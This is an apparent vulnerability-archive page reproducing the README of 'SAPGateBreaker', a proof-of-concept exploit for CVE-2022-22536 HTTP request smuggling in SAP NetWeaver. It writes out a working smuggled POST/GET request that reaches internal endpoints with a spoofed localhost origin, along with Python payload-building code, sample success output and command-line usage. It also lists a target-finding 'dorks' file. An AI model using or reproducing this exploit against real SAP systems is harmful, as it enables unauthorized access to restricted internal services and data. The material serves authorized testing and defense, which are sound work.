关联漏洞
标题:
SAP多个产品环境问题漏洞
(CVE-2022-22536)
描述:SAP NetWeaver Application Server Java等都是德国思爱普(SAP)公司的产品。SAP NetWeaver Application Server Java是一款提供了Java运行环境的应用程序服务器。SAP NetWeaver Application Server是一款应用程序服务器。SAP ERP是一系列用于ERP管理的软件。SAP CRM是一个客户关系管理系统。Sap Crm Web Channel等都是德国思爱普(Sap)公司的产品。Sap Crm Web Chann
描述
SAPGateBreaker is a PoC exploit for CVE-2022-22536, a critical HTTP Request Smuggling vulnerability in SAP NetWeaver. It demonstrates how to bypass ACLs by desynchronizing request parsing between ICM and backend services using crafted Content-Length-based payloads.
介绍
# CVE-2022-22536: HTTP Smuggling Through SAP's Front Door
SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable for request smuggling and request concatenation. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary Web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.
# SAPGateBreaker-Exploit
SAPGateBreaker is a PoC exploit for CVE-2022-22536, a critical HTTP Request Smuggling vulnerability in SAP NetWeaver. It demonstrates how to bypass ACLs by desynchronizing request parsing between ICM and backend services using crafted Content-Length-based payloads.
The vulnerability identified as CVE-2022-22536 represents a critical flaw in SAP NetWeaver Application Server, exposing installations to HTTP Request Smuggling attacks. This vulnerability, with a CVSS score of 9.8, affects both Java and ABAP stacks, allowing attackers to bypass access control mechanisms and interact with internal applications as though they were on the internal network.
**Understanding HTTP Request Smuggling**
HTTP Request Smuggling (HRS) is an advanced technique that exploits discrepancies in how different components of a web infrastructure (typically proxies, load balancers, and backend servers) interpret the boundaries between HTTP requests. By manipulating headers like `Content-Length` and `Transfer-Encoding`, an attacker can "smuggle" a malicious request that is desynchronized from what the backend server expects.
In essence, when a front-end and a back-end server disagree on where one request ends and the next begins, an attacker can inject a second, hidden request that will be processed with elevated trust. This often results in security bypasses such as WAF evasion, cache poisoning, or ACL circumvention.
**The Nature of CVE-2022-22536**
SAP’s ICM (Internet Communication Manager) improperly parses crafted HTTP requests, enabling a smuggled request to reach internal services. This is particularly impactful in segmented architectures, where direct access to internal services is restricted. Exploiting this vulnerability allows attackers to issue requests that appear to originate from the trusted internal network.
The vulnerability manifests when a payload abuses conflicting interpretations of the end of an HTTP request. This commonly involves injecting a `Transfer-Encoding: chunked` header or manipulating the `Content-Length` field to cause the desynchronization.
**Initial Payload Failures and Chunked Encoding Rejection**
During testing, payloads leveraging canonical chunked smuggling techniques led to `408 Request Timeout` responses from SAP ICM. This behavior indicated that SAP's HTTP stack does not support `Transfer-Encoding: chunked` in the expected manner, preventing traditional chunked-based desynchronization.
As a result, the exploit methodology shifted to using `Content-Length` headers for desynchronization. A crafted request with an empty chunked payload followed by a valid secondary HTTP request successfully bypassed request boundaries. This alternate strategy proved effective in bypassing internal access controls.
**Final Exploit Strategy and Code Implementation**
The working exploit sends a POST request to a public endpoint (`/sap/admin/public/default.html`) with a `Content-Length` header, followed by an embedded GET request that is intended to reach an internal resource.
```http
POST /sap/admin/public/default.html HTTP/1.1
Host: 172.32.22.7:50000
Authorization: Basic YTph
Cookie: saplb_*=(J2EE7364720)7364750
Content-Type: application/json
Content-Length: 128
0
GET /sap/bc/webdynpro/sap/appl_soap_management HTTP/1.1
Host: 127.0.0.1
X-Forwarded-For: 127.0.0.1
Connection: close
```
This results in a successful internal access:
```http
HTTP/1.1 200 OK
Server: SAP NetWeaver Application Server
Content-Length: 4465
Content-Type: text/html
Connection: Keep-Alive
```
The implementation iterates through a list of internal SAP URLs that are normally restricted. A comparison is made between the status code received via direct access and the one received when accessed through the smuggled request. If the internal access returns 200 (while direct access returns 403 or 404), it indicates that the smuggling technique successfully bypassed internal access controls.
The logic for building the payload:
```python
def build_smuggled_request(path):
return f"0\r\n\r\nGET {path} HTTP/1.1\r\nHost: 127.0.0.1\r\nX-Forwarded-For: 127.0.0.1\r\nConnection: close\r\n\r\n"
```
The attack is executed using a crafted POST request containing the smuggled payload:
```python
headers = {
"Host": f"{host}:{port}",
"Authorization": "Basic YTph",
"Cookie": "saplb_*=(J2EE7364720)7364750",
"Content-Type": "application/json",
"Content-Length": str(len(body.encode("utf-8")))
}
```
**Observed Results**
In multiple test cases, endpoints such as `/sap/public/bc/icf/info` or `/heapdump/`, which normally returned `403 Forbidden` or `404 Not Found`, responded with `200 OK` when accessed through the smuggled request. This demonstrates a successful circumvention of SAP’s access controls.
The tool’s output included both sent payloads and response headers, enabling precise forensic validation:
```
>>> Sent Payload:
POST /sap/admin/public/default.html HTTP/1.1
Host: 172.32.22.7:50000
...
>>> Received Response:
HTTP/1.1 200 OK
Server: SAP NetWeaver Application Server
...
```
Normal Request:
Exploit Request:
**Conclusion**
CVE-2022-22536 highlights the persistent threat posed by HTTP Request Smuggling in modern enterprise software stacks. The presented proof-of-concept is a demonstration of the underlying vulnerability and serves as a tool for validation and defense testing.
Administrators are strongly advised to apply SAP security updates and implement appropriate reverse proxy protections to prevent malformed HTTP request propagation.
More details on CVE-2022-22536 can be found at:
https://nvd.nist.gov/vuln/detail/CVE-2022-22536
SAP Security Note:
https://launchpad.support.sap.com/#/notes/3123396
**SAPGateBreaker Exploit**
SAPGateBreaker is a standalone Python tool that automates testing for CVE-2022-22536, a critical HTTP Request Smuggling vulnerability in SAP NetWeaver Application Server.
---
**Usage**
```bash
python3 sapgatebreaker.py -u http://<target-host>:<port> [--verbose]
```
**Arguments:**
- `-u`, `--url`: Target URL (e.g., `http://172.32.22.7:50000`)
- `-v`, `--verbose`: Enables detailed header and body output for each request and response
**Features:**
- Detects SAP NetWeaver version via HTTP header inspection
- Builds desynchronized HTTP request payloads for internal access testing
- Compares direct vs. smuggled responses to identify bypasses
- Logs all data to `poc.txt` for further analysis
**Remediation:**
https://community.sap.com/t5/technology-blogs-by-members/remediation-of-cve-2022-22536-request-smuggling-and-request-concatenation/ba-p/13528083
**Disclaimer**
This tool is intended for educational and authorized penetration testing only. Unauthorized use against systems without explicit permission is strictly prohibited and may violate applicable laws.
文件快照
[4.0K] /data/pocs/a0c8d4cc9c9ec2e3fcb3dc3a67313deb13f27c7c
├── [ 485] dorks
├── [1.0K] LICENSE
├── [7.8K] README.md
└── [9.0K] sapgatebreaker.py
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。